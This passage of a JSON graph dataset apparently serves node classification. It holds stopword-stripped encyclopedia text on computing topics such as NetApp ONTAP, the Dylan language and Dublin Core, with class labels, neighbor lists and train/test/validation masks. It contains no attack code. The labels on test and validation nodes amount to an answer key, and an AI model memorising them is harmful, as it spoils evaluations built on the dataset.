ontap storage system fabric pool currently compatible netapp storagegrid amazon s3 google cloud alibaba object storage services starting ontap 9.4 azure blob supported starting 9.5 ibm cloud object storage icos amazon commercial cloud services c2s supported object-based sw services could used requested user service validated netapp flexgroup volumes supported fabricpool starting ontap 9.5 fabric pool feature fas/aff systems free use netapp storagegrid external object storage object storage systems amazon s3 azure blob fabric pool must licensed per tb function alongside costs fabric pool licensing customer needs also pay consumed object space cloud volumes ontap storage system fabric pool require licensing costs apply consumed space object storage starting ontap 9.5 capacity utilization triggering tiering hot tier adjusted svm-dr also supported flexgroups netapp storage systems running ontap flash cache formally performance accelerate module pam custom purpose-built proprietary pcie card hybrid netapp fas systems flash cache reduce read latencies allows storage systems process read-intensive work without adding spinning disk underlying raid since read operations require redundancy case flash cache failure flash cache works controller level accelerates read operations separate volume controller different caching policy read cache could disabled volume flashcache caching policies applied flexvol level flashcache technology compatible flexarray feature starting 9.1 single flexvol volume benefit flashpool flashcache caches simultaneously starting ontap 9.5 flash cache read-cache technology available cloud volumes ontap use ephemeral ssd drives ndas proxy service introduced ontap 9.5 works conjunction ndas service cloud provider similarly fabricpool ndas stores data object format unlike fabricpool stores wafl metadata object storage well information transferred ontap system snapshot deltas entire set data already deduplicated compressed volume level ndas proxy basically http s3 object protocol additional api calls cloud ndas ontap 9.5 works schema primary ontap 9 storage replicating data via snapmirror secondary ontap 9.5 storage secondary storage also ndas proxy storage qos free feature ontap systems types storage qos ontap systems adaptive qos a-qos includes absolute minimum qos ordinary static qos minimum qos qos min maximum qos qos max maximum qos configured static upper limit iops mb/s applied object volume lun file prevent object consuming storage performance resources defined administrator thus isolating performance-intensive bullies protecting workloads minimum qos contrary maximum set volumes ensure volume get less configured administrator static number iops contention storage performance resources could applied volumes a-qos mechanism automatically changing qos based consumed space flexible volume consumed space could grow decrease size flexvol changed fas systems a-qos reconfigures peak performance qos max aff systems reconfigure expected performance qos min peak performance qos max volume a-qos allows ontap automatically adjust number iops volume based a-qos policies three basic a-qos policies extreme performance value a-qos policy predefined fixed ratio io per tb peak performance expected performance absolute minimum qos absolute minimum qos used instead expected performance qos min volume size ratio io per tb small example 10gb ontap os number features increase security storage system like onboard key manager passphrase controller boot nse nve encryption usb key manager available starting 9.4 auditing nas events another security measure ontap enables customer track log certain cifs nfs events storage system helps track potential security problems provides evidence security breaches ontap accessed ssh ability authenticate common access card ontap supports rbac role-based access control allows administrative accounts restricted and/or limited actions take system rbac prevents single account allowed perform potential actions available system beginning ontap 9 kerberos 5 authentication privacy service krb5p supported nas krbp5 authentication mode protects data tampering snooping using checksums encrypt traffic client server ontap solution supports 128-bit 256-bit aes encryption kerberos onboard key manager free feature introduced 9.1 store keys nve encrypted volumes nse disks nse disks available aff/fas platforms ontap systems also allow storing encryption keys usb drive connected appliance ontap also use external key manager like gemalto trusted key manager netapp volume encryption nve flexvol volume-level software-based encryption uses storage cpu data encryption purposes thus performance degradation expected though less noticeable high-end storage systems cpu cores nve licensed free feature compatible nearly netapp ontap features protocols similarly netapp storage encryption nse nve store encryption key locally dedicated key manager like ibm security key lifecycle manager safenet keysecure cloud key managers nve like nse also data rest encryption means protects physical disks theft give additional level data security protection normal operational running system nve combination fabricpool technology also protect data unauthorized access external s3 storage systems like amazon since data already encrypted transferring wire encrypted form starting ontap 9.4 new feature introduced called secure purge provides ability securely delete file comply gdpr requirements ontap vscan fpolicy aimed malware prevention ontap systems nas vscan provides way netapp antivirus scanner partners verify files virus free fpolicy integrates netapp partners monitor file access behaviors fpolicy file-access notification system monitor activity nas storage prevent unwanted access change files based policy settings helps prevent ransomware getting foothold first place mtu black-hole detection path mtu discovery pmtud processes ontap system connected via ethernet network detects maximum mtu size ontap 9.2 online certificate status protocol ocsp ldap tls iscsi endpoint isolation specify range ip addresses log storage limit number failed login attempts ssh ntp symmetric authentication supported starting ontap 9.5 netapp offers set server-based software solutions monitoring integration ontap systems commonly-used free software oncommand unified performance manager data availability performance monitoring solution netapp workflow automation wfa free server-based product used netapp storage orchestration includes self-service portal web-based gui nearly routine storage operations sequences operations configured workflows published service end users order consume netapp storage service snapcenter previously known snapmanager suite server-based product netapp also offers products taking application-consistent snapshots coordinating application netapp storage array products support microsoft exchange microsoft sql server microsoft sharepoint oracle sap vmware esx server data products form part snapmanager suite snapcenter also includes third-party plugins mongodb ibm db2 mysql allows end user create plugins integration ontap storage system snapmanager snapcenter enterprise-level licensed products similar free less capable netapp product exists named snapcreator intended customers wish integrate ontap application-consistent snapshots applications license snapcenter netapp claims snapcenter capabilities expand include solidfire storage endpoints snapcenter controller based licensing aff/fas systems terabyte sds ontap snapcenter plug-in gor vmware vsphere called netapp data broker separate linux-based applience used without snapcenter netapp services level manager nslm short software provisioning ontap storage delivers predictable performance capacity data protection workload exposes restful apis built-in swagger documentation list available apis also integrated netapp storage products like oncommand unified manager nslm exposes three standard service levels ssl based service level objectives slo creates custom service levels nslm created provide predicted serviceprovider-like storage consumption nslm space-based licensed product ontap systems ability integrate hadoop teragen teravalidate terasort apache hive apache mapreduce tez execution engine apache spark apache hbase azure hdinsight hortonworks data platform products cloudera cdh netapp in-place analytics module also known netapp nfs connector hadoop provide access analyze data using external shared nas storage primary secondary hadoop storage ontap provisioning usage automated many ways directly use additional netapp software 3rd party software ontap operating system used storage disk arrays three platforms ontap software used netapp fas aff ontap select cloud volumes ontap platform ontap uses kernel slightly different set features fas richest functionality among platforms fas flash fas aff systems proprietary custom-built hardware netapp ontap software aff systems contain ssd drives ontap aff optimized tuned flash memory fas systems may contain hdd hdd-only systems hdd ssd hybrid systems ontap fas aff platforms create raid arrays raid-4 raid-dp raid-tec arrays disks disk partitions data protection reasons ontap select cloud volumes ontap leverage raid data protection provided environment run fas aff systems support metro cluster functionality ontap select cloud volumes ontap platforms ontap select cloud volumes ontap virtual storage appliances vsa based previous product ontap edge also known ontap-v considered software-defined storage ontap select cloud volumes ontap includes plex aggregate abstractions n't lower level raid module included os therefore raid-4 raid-dp raid-tec supported ontap storage system similarly flexarray functionality leverages raid data protection ssd hdd drive level underlying storage systems starting ontap select 9.4 ontap deploy 2.8 software raid supported requirements 3rd party hw raid equipment ontap select cloud volumes ontap virtual machines n't support fibre channel fibre channel ethernet front-end data protocols consume space underlying storage hypervisor added vsa virtual disks represented treated inside ontap disks ontap select cloud volumes ontap provide high availability deduplication resiliency data recovery robust snapshots integrated application backup application consistent snapshots nearly ontap functionality exceptions software-defined versions ontap nearly functionality except hardware-centric features like ifgroups service processor physical disk drives encryption metrocluster fcp fiber channel protocol ontap select run vmware esxi linux kvm hypervisors ontap select leveraged raid data protection ssd hdd drive level underlying das san vsan storage systems starting ontap select 9.4 ontap deploy 2.8 software raid supported requirements 3rd party hw raid equipment kvm staring ontap 9.5 esxi ontap deploy virtual machine provides mediator function metrocluster 2-node configurations keeps track licensing used initial cluster deployment starting ontap deploy 2.11.2 vcenter plugin introduced allows performing ontap deploy functionality vcenter previously management performed either command line vsphere vm ova setup master like fas platform ontap select supports high availability clustering fas platform ontap select offered two versions hdd-only flash optimized previously ontap select known data ontap edge data ontap edge product data ontap os version 8 able run atop vmware esxi starting ontap 9.5 sw-metrocluster nsx overlay network supported starting ontap 9.5 licensing changed capacity tier-based licenses linked node perpetual capacity pool licensing time-limited subscription ontap select 9.5 get mqtt protocol supported data transferring edge data center cloud april 2019 octavian tanase svp ontap posted preview photo twitter ontap running kubernetes container demonstration cloud volumes ontap formally ontap cloud includes nearly functionality ontap select also virtual storage appliance vsa ordered hyper-scale providers cloud computing amazon aws microsoft azure ibm cloud uses ontap select reasons instead cloud volumes ontap cloud volumes ontap provide high availability data across different regions cloud cloud volumes ontap leverages raid data protection ssd hdd drive level underlying ip san storage system cloud provider feature comparison platforms latest ontap version",
    "neighbors": [
      5380,
      8073,
      1935,
      5397,
      9365,
      11030,
      10016,
      6569,
      7983,
      6705,
      823,
      7863,
      7483,
      9151,
      11201,
      7234,
      3142,
      7248,
      10833,
      210,
      3927,
      5210,
      3042,
      4194,
      10340,
      10341,
      8298,
      3820,
      5356,
      7022,
      499,
      5363,
      6003,
      890,
      10111
    ],
    "mask": "None"
  },
  {
    "node_id": 3043,
    "label": 3,
    "text": "Rockchip_RK3288:rockchip rk3288 rockchip rk3288 arm architecture system chip soc rockchip first soc august 2014 uses 32 bit arm cortex-a17 processor quad-core processor neon coprocessor hardware acceleration video 3d graphics used number chromebooks low-power low-performance devices rk3288-c used veyron board design several chromebooks powers following devices",
    "neighbors": [
      2788,
      1578,
      4683,
      9163,
      9964,
      9042,
      9970,
      373,
      2838
    ],
    "mask": "Test"
  },
  {
    "node_id": 3044,
    "label": 4,
    "text": "IP_reader:ip reader ip reader electronic security device designed identify users control entry exit protected areas ip reader two features distinguish access control readers first ip reader introduced 1999 isonas security systems inc hid global one major manufacturers access control reader card business followed move network-based security systems 8 years later introduction edge ip reader family 2007 biometric reader manufacturers sagem securite suprema inc. also added ip readers product line-up ip readers potential make significant impact security market open communication standards existed currently access control systems utilize proprietary communication protocols effectively eliminate freedom choice decision install certain access control system made end-user locked buying brand readers controllers cards software receiving service dealer exclusive rights represent particular brand area hardware software different manufacturers compatible open communication standards supported access control manufacturers ip reader market segment could enjoy growth similar ip cameras standard hardware platform would increase interoperability systems allow end-users take advantage new technologies without need replace already installed systems pave way towards fully integrated security systems offering superior set features",
    "neighbors": [
      5472,
      2737,
      4956,
      6471
    ],
    "mask": "None"
  },
  {
    "node_id": 3045,
    "label": 1,
    "text": "User-defined_function:user-defined function user-defined function udf function provided user program environment context usual assumption functions built program environment old implementations basic programming language user-defined functions defined using def fn syntax modern dialects basic influenced structured programming paradigm code written user-defined functions procedures concept becomes practically redundant relational database management systems user-defined function provides mechanism extending functionality database server adding function evaluated standard query language usually sql statements standard distinguishes scalar table functions scalar function returns single value null whereas table function returns relational table comprising zero rows row one columns user-defined functions sql declared using codice_1 statement example function converts celsius fahrenheit might declared like created user-defined function may used expressions sql statements example invoked intrinsic functions allowed also includes select statements function used data stored tables database conceptually function evaluated per row usage example assume table named elements row known chemical element table column named boilingpoint boiling point element celsius query would retrieve name boiling point row invokes ctof user-defined function declared order convert value column value fahrenheit user-defined function carries certain properties characteristics sql standard defines following properties user-defined functions confused stored procedures stored procedures allow user group set sql commands procedure accept parameters execute sql statements depending parameters procedure expression thus used like user-defined functions database management systems allow creation user defined functions languages sql microsoft sql server example allows user use .net languages including c purpose db2 oracle support user-defined functions written c java programming languages three types udf microsoft sql server 2000 scalar functions inline table-valued functions multistatement table-valued functions scalar functions return single data value table returns clause scalar functions use scalar data types exception timestamp user-defined data types inline table-valued functions return result set single select statement multistatement table-valued functions return table built many transact-sql statements user-defined functions invoked query like built‑in functions object_id len datediff executed execute statement like stored procedures performance notes 1 microsoft sql server 2000 table-valued function wraps view may much faster view following myfunction example function-wrapper runs faster underlying view myview 2 microsoft sql server 2005 result code execution opposite view executed faster function-wrapper user-defined functions subroutines made one transact-sql statements used encapsulate code reuse takes zero arguments evaluates return value control-flow dml statements body similar stored procedures allow changes global session state like modifications database external resource file network support output parameter default keyword must specified pass default value parameter errors udf cause udf abort turn aborts statement invoked udf data type supported microsoft sql server 2000 like temporary table used store results mostly used define temporary variable type table return value udf scope limited function stored procedure batch defined assignment operation allowed table variables may used select insert update delete create function create udf alter function change characteristics udf drop function remove udf apache hive defines addition regular user defined functions udf also user defined aggregate functions udaf table-generating functions udtf hive enables developers create custom functions java",
    "neighbors": [
      2946,
      4630,
      10518,
      2456,
      11030,
      5403,
      4255,
      9893,
      4781,
      9389,
      10413,
      4024,
      5051,
      4674,
      6850,
      1222,
      712,
      7627,
      10586,
      8028,
      8799,
      8295
    ],
    "mask": "None"
  },
  {
    "node_id": 3046,
    "label": 9,
    "text": "Bidule:bidule bidule commercial software application creation interactive computer music multimedia produced canadian company plogue arts technology runs windows mac computers bidule uses modular structure based patch cord metaphor much like audiomulch reaktor pure data max/msp individual modules called bidules plogue web site states word bidule french thingy gadget set bidules connections called layout sub-patches called groups built within layouts saved use elsewhere program features real time audio midi open sound control osc spectral processing audio daw software rewire bidule run rewire mixer device bidule run standalone vst vsti au plugin host asio/coreaudio supported low latency audio bidule use multithread processing beta build discrete processing parameters linked midi osc input module parameters one hundred modules groups come software including modules perform high-level math signals",
    "neighbors": [
      7769,
      9783,
      6797,
      7983
    ],
    "mask": "None"
  },
  {
    "node_id": 3047,
    "label": 4,
    "text": "Trademark_(computer_security):trademark computer security trademark computer security contract code verifies security properties object code requires object certain security properties useful ensuring secure information flow object-oriented languages trademarking analogous signing data often implemented without cryptography trademark two operations operation analogous private key digital signature process must exposed untrusted code applied immutable objects makes sure verifytrademark called value returns true operation analogous public key digital signature process exposed untrusted code returns true if-and-only-if applytrademark called given object trademarking inverse taint checking whereas taint checking black-listing approach says certain objects trusted trademarking white-listing approach marks certain objects certain security properties apply trademark thought memoizing verification process sometimes verification process need done fact value particular security property verified statically case apply property used assert object produced code formally verified produce outputs particular security property one way applying trademark java",
    "neighbors": [
      4198
    ],
    "mask": "Test"
  },
  {
    "node_id": 3048,
    "label": 2,
    "text": "Insure++:insure++ insure++ memory debugger computer program used software developers detect various errors programs written c c++ made parasoft functionally similar memory debuggers purify valgrind dr memory insure++ automatically find erroneous accesses freed memory use-after-free situations array-bounds violations freeing unallocated memory often happens programmer frees memory twice frees global stack memory many others unlike purify valgrind insure++ inserts instrumentation source-code level allows detect errors tools miss particular insure++ detect buffer overflows automatic arrays overflows involve pointers accidentally jump one valid memory region another following example source-level instrumentation allows identify leak occurred occurred tools merely provide information memory allocated insure++ also gives stack trace when/where actual leak occurred additionally insure++ produce linear code sequence jump code coverage metrics tested code",
    "neighbors": [
      1474,
      1730,
      1954,
      5612,
      6797,
      814,
      815,
      7983,
      4407,
      823,
      9432,
      1689,
      11644,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 3049,
    "label": 2,
    "text": "Visopsys:visopsys visopsys visual operating system operating system written andy mclaughlin development operating system began 1997 operating system licensed gnu gpl headers libraries less restrictive lgpl license runs 32-bit ia-32 architecture features multitasking kernel supports asynchronous i/o fat line file systems requires pentium processor development visopsys began 1997 written andy mclaughlin first public release operating system 2 march 2001 version 0.1 release visopsys 32 bit operating system supporting preemptive multitasking virtual memory visopsys uses monolithic kernel written c programming language elements assembly language certain interactions hardware operating system sports graphical user interface small c library",
    "neighbors": [
      477,
      2179,
      5380,
      8262,
      7983,
      5363,
      11539,
      7483,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 3050,
    "label": 3,
    "text": "ST6_and_ST7:st6 st7 st6 st7 8-bit microcontroller product lines stmicroelectronics commonly used small embedded applications like washing machines although use similar peripherals marketed part product line two architectures actually quite different 8-bit accumulator used operations plus two 8-bit index registers x used memory addressing also 8-bit instructions followed 2 bytes operands support manipulating branching individual bits memory similarities end st6 harvard architecture 8-bit 256 byte data address space separate 12-bit 4096 byte program space operands always 1 byte long instructions support two operands move 8-bit immediate 8-bit memory address subroutine calls done using separate hardware stack data registers program counter flags memory-mapped st6 addressing modes limited immediate 8-bit absolute memory address register indirect modes x st7 von neumann architecture single 16-bit 64 kib address space first 256 bytes ram zero page extra flexibility two-operand instructions except test bit branch registers memory-mapped uses general-purpose ram plus stack pointer register subroutine calls st7 supports wide variety addressing modes including base+index double-indirect st6 64 bytes ram 4096 bytes program rom larger amounts accessed bank-switching low 2k section rom ram address space actually 256 bytes divided follows mapped address space 12-bit program counter associated hardware stack four six levels deep depending model two status bits carry zero banked based processor mode separate status bits normal interrupt non-maskable interrupt operation first four general-purpose ram locations also known x v w registers instructions access using special short addressing modes x registers serve index registers use indirect addressing modes codice_1 codice_2 instruction set consists one byte opcode followed two one-byte operands instruction set summarized follows st7 six registers accumulator x index registers stack pointer program counter condition code register also double-indirect addressing allows zero page ram serve additional registers unusual useful feature interrupt pushes four registers stack x well usual pc cc interrupt return restores alu instructions fall two categories two-operand one-operand two-operand instructions use accumulator first source addressing mode specifies second source may destination usually accumulator instructions modify second source immediate operands forbidden cases one-operand instructions use specified operand source destination operand may register plus offset computes full-width sum 8-bit form may address memory 255+255 510 addition three prefix bytes may prepended instruction make sense",
    "neighbors": [
      7170,
      1029,
      6925,
      11405,
      1170,
      7445,
      7323,
      1660,
      4773,
      6821,
      6950,
      9638,
      682,
      2224,
      11314,
      10945,
      7235,
      9928,
      6607,
      9044,
      9685,
      4569,
      9563,
      9964,
      11374,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 3051,
    "label": 9,
    "text": "Dylan_(programming_language):dylan programming language dylan multi-paradigm programming language includes support functional object-oriented programming oop dynamic reflective providing programming model designed support generating efficient machine code including fine-grained control dynamic static behaviors created early 1990s group led apple computer concise thorough overview language may found dylan reference manual dylan derives scheme common lisp adds integrated object system derived common lisp object system clos dylan values including numbers characters functions classes first-class objects dylan supports multiple inheritance polymorphism multiple dispatch keyword arguments object introspection pattern-based syntax extension macros many advanced features programs express fine-grained control dynamism admitting programs occupy continuum dynamic static programming supporting evolutionary development allowing rapid prototyping followed incremental refinement optimization dylan main design goal dynamic language well-suited developing commercial software dylan attempts address potential performance issues introducing natural limits full flexibility lisp systems allowing compiler clearly understand compilable units libraries dylan derives much semantics scheme lisps dylan implementations initially built within extant lisp systems however dylan algol-like syntax instead lisp-like prefix syntax dylan created early 1990s group led apple computer one time development intended use apple newton computer dylan implementation reach sufficient maturity time newton instead used mix c newtonscript developed walter smith apple ended dylan development effort 1995 though made technology release version available apple dylan tr1 included advanced integrated development environment ide two groups contributed design language developed implementations harlequin released commercial ide microsoft windows carnegie mellon university released open source compiler unix systems called gwydion dylan implementations open source harlequin implementation named open dylan maintained group volunteers dylan hackers dylan language code-named ralph james joaquin chose name dylan dynamic language many dylan syntax features come lisp heritage originally dylan used lisp-like prefix syntax based s-expressions time language design completed syntax changed algol-like syntax expectation would familiar wider audience programmers syntax designed michael kahl described great detail dylan reference manual dylan case sensitive dylan lexical syntax allows use naming convention hyphen-minus signs used connect parts multiple-word identifiers sometimes called lisp-case kebab case convention common lisp languages used programming languages treat hyphen-minus part numeric literal single lexical token even surrounded whitespace characters identifiers dylan may contain special characters languages besides alphanumeric characters hyphen-minus signs dylan allows following non-alphanumerical characters part identifiers underscore codice_1 asterisk codice_2 ampersand codice_3 less-than sign codice_4 equals sign codice_5 greater-than sign codice_6 vertical bar codice_7 caret codice_8 dollar sign codice_9 percent sign codice_10 sign codice_11 identifiers may consist non-alphanumeric characters numeric characters alone ambiguity whitespace used simple class several slots convention classes named less-than greater-than signs used angle brackets e.g class named codice_12 code example codice_13 codice_14 codice_12 optional true codice_16 clauses example may write codice_17 codice_16 terminate codice_19 statement class rewritten minimal way possible slots typed codice_20 slots must initialized manually convention constant names begin factorial function codice_21 codice_22 normal identifiers explicit return statement result method function last expression evaluated common style leave semicolon expression return position many object-oriented languages classes main means encapsulation modularity class defines namespace controls definitions externally visible classes many languages define indivisible unit must used whole example using codice_23 concatenation function requires importing compiling codice_23 languages including dylan also include separate explicit namespace module system performs encapsulation general way dylan concepts compile-unit import-unit separated classes nothing specifically either library defines items compiled handled together module defines namespace classes placed together modules cut across programmer wishes often complete definition class exist single module spread across several optionally collected together different programs different definitions class including need example consider add-on library regex support codice_23 languages functionality included strings functionality must added codice_23 namespace soon occurs codice_23 class becomes larger functions n't need use regex still must pay increased library size reason sorts add-ons typically placed namespaces objects downside approach new functions longer part codice_23 instead isolated set functions must called separately instead codice_29 would natural organization oo viewpoint something like codice_30 used effectively reverses ordering dylan many interfaces defined code instance string concatenation method could placed string interface concat interface collects together different concatenation functions various classes commonly used math libraries functions tend applicable widely differing object types practical use interface construct build public private versions module something languages include bolt feature invariably causes problems adds syntax dylan every function call simply places private development interface collect publicly accessible functions codice_31 java c++ visibility object defined code meaning support similar change programmer would forced rewrite definitions fully could two versions time classes dylan describe codice_32 data members fields ivars etc objects fashion similar oo languages access slots via methods smalltalk default getter setter methods automatically generated based slot names contrast oo languages methods applicable class often defined outside class thus class definitions dylan typically include definition storage instance define class window view end class example class codice_33 defined class name syntax convention make class names stand out—the angle brackets merely part class name contrast languages convention capitalize first letter class name prefix name c example codice_33 inherits single class codice_35 contains two slots codice_36 holding string window title codice_37 holding x-y point corner window example title given default value position optional init-keyword syntax allows programmer specify initial value slot instantiating object class languages c++ java class would also define interface case definition explicit instructions languages access slots methods considered codice_38 meaning used subclasses allow unrelated code use window instances must declared codice_39 dylan sorts visibility rules considered part code module/interface system adds considerable flexibility instance one interface used early development could declare everything public whereas one used testing deployment could limit c++ java changes would require changes source code people wo n't whereas dylan fully unrelated concept although example use dylan also supports multiple inheritance dylan methods intrinsically associated specific class methods thought existing outside classes like clos dylan based multiple dispatch multimethods specific method called chosen based types arguments method need known compile time understanding required function may available based user preferences java methods would isolated specific class use functionality programmer forced import class refer explicitly call method class unavailable unknown compile time application simply wo n't compile dylan code isolated storage functions many classes methods call functions thereby looking feeling like oo languages however code may also located generic functions meaning attached specific class called natively anyone linking specific generic function method class accomplished thusly define method turn-blue w window end method definition similar languages would likely encapsulated within codice_33 class note setter call syntactic sugar codice_41 utility generic methods comes consider generic examples instance one common function languages codice_42 returns human-readable form object instance window might return title position parens string would return dylan methods could collected single module called codice_42 thereby removing code definition class specific object support codice_42 could easily added codice_42 module whole concept might strike readers odd code handle codice_42 window n't defined codice_33 might make sense consider dylan handles call codice_42 languages program compiled codice_42 codice_33 looked replaced pointer less method dylan occurs program first run runtime builds table method-name/parameters details looks methods dynamically via table means function specific method located anywhere compile-time unit end programmer given considerable flexibility terms place code collecting along class lines appropriate functional lines implication programmer add functionality existing classes defining functions separate file instance might wish add spell checking codice_51s languages would require access source code string class—and basic classes rarely given source form dylan extensible languages spell checking method could added codice_52 module defining classes applied via codice_53 construct case actual functionality might defined single generic function takes string returns errors codice_52 module compiled program strings objects get added functionality apple dylan implementation dylan produced apple computer originally developed apple newton product",
    "neighbors": [
      512,
      10752,
      5635,
      11269,
      2056,
      2062,
      9231,
      6160,
      2577,
      7184,
      9749,
      8728,
      2585,
      4122,
      4633,
      9245,
      8226,
      5677,
      3119,
      1591,
      2105,
      3642,
      3132,
      6717,
      6718,
      8258,
      8771,
      10819,
      8262,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      8293,
      2666,
      5751,
      7805,
      9345,
      1159,
      9865,
      6797,
      10386,
      9875,
      9877,
      5803,
      2225,
      7867,
      4799,
      10435,
      7880,
      8908,
      205,
      5837,
      5330,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      9960,
      5356,
      4846,
      5360,
      5361,
      9969,
      8435,
      2804,
      9975,
      6906,
      2304,
      4865,
      4867,
      5380,
      3334,
      6919,
      3336,
      1301,
      10012,
      3869,
      2335,
      2849,
      7981,
      7983,
      2352,
      10547,
      11574,
      311,
      6969,
      3408,
      6994,
      1365,
      2392,
      10083,
      6502,
      11625,
      8554,
      5492,
      3446,
      10104,
      377,
      4992,
      7562,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      9128,
      11688,
      7616,
      5569,
      6594,
      4550,
      11218,
      11219,
      10712,
      3034,
      4069,
      5611,
      5612,
      7670,
      11255,
      2556
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3052,
    "label": 3,
    "text": "Dublin_Core:dublin core dublin core schema small set vocabulary terms used describe digital resources video images web pages etc well physical resources books cds objects like artworks full set dublin core metadata terms found dublin core metadata initiative dcmi website original set 15 classic metadata terms known dublin core metadata element set dcmes endorsed following standards documents dublin core metadata may used multiple purposes simple resource description combining metadata vocabularies different metadata standards providing interoperability metadata vocabularies linked data cloud semantic web implementations dublin refers dublin ohio usa schema originated 1995 invitational oclc/ncsa metadata workshop hosted oclc online computer library center library consortium based dublin national center supercomputing applications ncsa core refers metadata terms broad generic usable describing wide range resources semantics dublin core established maintained international cross-disciplinary group professionals librarianship computer science text encoding museums related fields scholarship practice starting 2000 dublin core community focused application profiles – idea metadata records would use dublin core together specialized vocabularies meet particular implementation requirements time world wide web consortium work generic data model metadata resource description framework rdf maturing part extended set dcmi metadata terms dublin core became one popular vocabularies use rdf recently context linked data movement dublin core metadata initiative dcmi provides open forum development interoperable online metadata standards broad range purposes business models dcmi activities include consensus-driven working groups global conferences workshops standards liaison educational efforts promote widespread acceptance metadata standards practices 2008 dcmi separated oclc incorporated independent entity currently changes made dublin core standard reviewed dcmi usage board within context dcmi namespace policy dcmi-namespace policy describes terms assigned also sets limits amount editorial changes allowed labels definitions usage comments dublin core standard originally included two levels simple qualified simple dublin core comprised 15 elements qualified dublin core included three additional elements audience provenance rightsholder well group element refinements also called qualifiers could refine semantics elements ways may useful resource discovery since 2012 two incorporated dcmi metadata terms single set terms using rdf data model full set elements found namespace http //purl.org/dc/terms/ definition terms often contains domains ranges may compatible pre-rdf definitions used original 15 dublin core elements separate namespace original 15 elements previously defined http //purl.org/dc/elements/1.1/ original dcmes version 1.1 consists 15 metadata elements defined way original specification dublin core element optional may repeated dcmi established standard ways refine elements encourage use encoding vocabulary schemes prescribed order dublin core presenting using elements dublin core became niso standards z39.85 ietf rfc 5013 2007 iso 15836 standard 2009 used base-level data element set description learning resources iso/iec 19788-2 metadata learning resources mlr – part 2 dublin core elements prepared iso/iec jtc1 sc36 full information element definitions term relationships found dublin core metadata registry archive form web page webcite says part metadata optional dublin core elements ... superseded 2008 dcmi metadata terms subsequent specification original 15 elements ongoing process develop exemplary terms extending refining dcmes begun additional terms identified generally working groups dcmi judged dcmi usage board conformance principles good practice qualification dublin core metadata elements element refinements make meaning element narrower specific refined element shares meaning unqualified element restricted scope guiding principle qualification dublin core elements colloquially known dumb-down principle states application understand specific element refinement term able ignore qualifier treat metadata value unqualified broader element may result loss specificity remaining element value without qualifier continue generally correct useful discovery addition element refinements qualified dublin core includes set recommended encoding schemes designed aid interpretation element value schemes include controlled vocabularies formal notations parsing rules value expressed using encoding scheme may thus token selected controlled vocabulary example term classification system set subject headings string formatted accordance formal notation example 2000-12-31 iso standard expression date encoding scheme understood application value may still useful human reader audience provenance rightsholder elements part simple dublin core 15 elements use audience provenance rightsholder using qualified dublin core dcmi also maintains small general vocabulary recommended use within element type vocabulary currently consists 12 terms dcmi metadata terms lists current set dublin core vocabulary set includes fifteen terms dcmes italic well qualified terms term unique uri namespace http //purl.org/dc/terms defined rdf properties syntax choices metadata expressed dublin core elements depend context dublin core concepts semantics designed syntax independent apply variety contexts long metadata form suitable interpretation machines people dublin core abstract model provides reference model particular dublin core encoding guidelines compared independent particular encoding syntax reference model helps implementers get better understanding kinds descriptions trying encode facilitates development better mappings translations different syntaxes one document type definition based dublin core open source metadata framework omf specification omf turn used rarian superseding scrollkeeper used gnome desktop kde help browsers scrollserver documentation server pbcore also based dublin core zope cmf metadata products used plone erp5 nuxeo cps content management systems simpledl fedora commons also implement dublin core epub e-book format uses dublin core metadata opf file",
    "neighbors": [
      2948,
      10004,
      7575,
      11674,
      9248,
      53,
      6330,
      10938,
      4797,
      9669,
      2377,
      5449,
      595,
      9043,
      2901,
      9941,
      10452,
      11221,
      479,
      6629,
      4847,
      119,
      124
    ],
    "mask": "None"
  },
  {
    "node_id": 3053,
    "label": 4,
    "text": "Double_Image_Backup:double image backup double image backup software runs windows laptops workstations windows servers double image first released march 1994 since followed major releases double image 7.0 released january 12 2011 become compatible windows 7 windows vista windows server 2008 operating systems double image 7.0.58 released march 15 2018 included compatibility windows 10 windows 8 windows server 2016 windows server 2012 added options file synchronization using 'major delete feature double image code installation package code sign certified using sha-2 current release double image 7.0.61 released august 26 2018 features systems supported remain previous versions release several bug fixes including dealing windows 10 registry restore",
    "neighbors": [
      5384,
      1801,
      6797,
      4505,
      3366,
      3629,
      6062,
      7983,
      823,
      1978,
      9025,
      1358,
      2383,
      5339,
      4074,
      5356,
      3949,
      1776,
      499
    ],
    "mask": "Test"
  },
  {
    "node_id": 3054,
    "label": 4,
    "text": "Implicit_authentication:implicit authentication implicit authentication ia technique allows smart device recognize owner acquainted his/her behaviors technique uses machine learning algorithms learn user behavior various sensors smart devices achieve user identification current authentication techniques e.g. password pattern lock finger print iris recognition explicit authentication require user input comparing explicit authentication ia transparent users usage significantly increases usability reducing time users spending login users find annoying lack cellular coverage implicit authentication ia user behaviors raw data captured various sensors embedded smart device stored database preparing processing filtering noise selecting suitable features data sent machine learning tool train return fine-tuned model back smart device smart device uses model signature identify current user due battery computation limitation smart device training phase computations carried usually implemented remote server lightweight algorithms e.g. kl divergence implemented local device parts real-time authentication units control lock mechanism device developing ia model largely depends operating systems usually adopt android ios two different approaches establish ia model device-centric application-centric device-centric approaches traditional way establish ia model leverage information gathered operating system various sensors ia model directly running operating system application-centric approaches however achieve ia establishing individual framework app executes independently sandbox preserves intrinsic structure operating system simplifies ia developing 1977 wood indicated two types bio-metric authentication approaches physiological behavioral bio-metrics second approach related user gait location information keystroke patterns utilization bio-metrics user authentication developed field location-based access control notably keystroke dynamics typing pattern 2010 shi et al migrated bio-metrics authentication approach mobile device contained many sensors significantly increased accuracy authentication called new approach implicit authentication due fast growth smart technology smart device became sophisticated computational power grew year provided foundation ia achieve high accurate user-friendly authentication current ia approaches mainly focused touch sensor gps accelerometer corresponding techniques svm knn gmm topic model",
    "neighbors": [
      4972,
      10102
    ],
    "mask": "Test"
  },
  {
    "node_id": 3055,
    "label": 7,
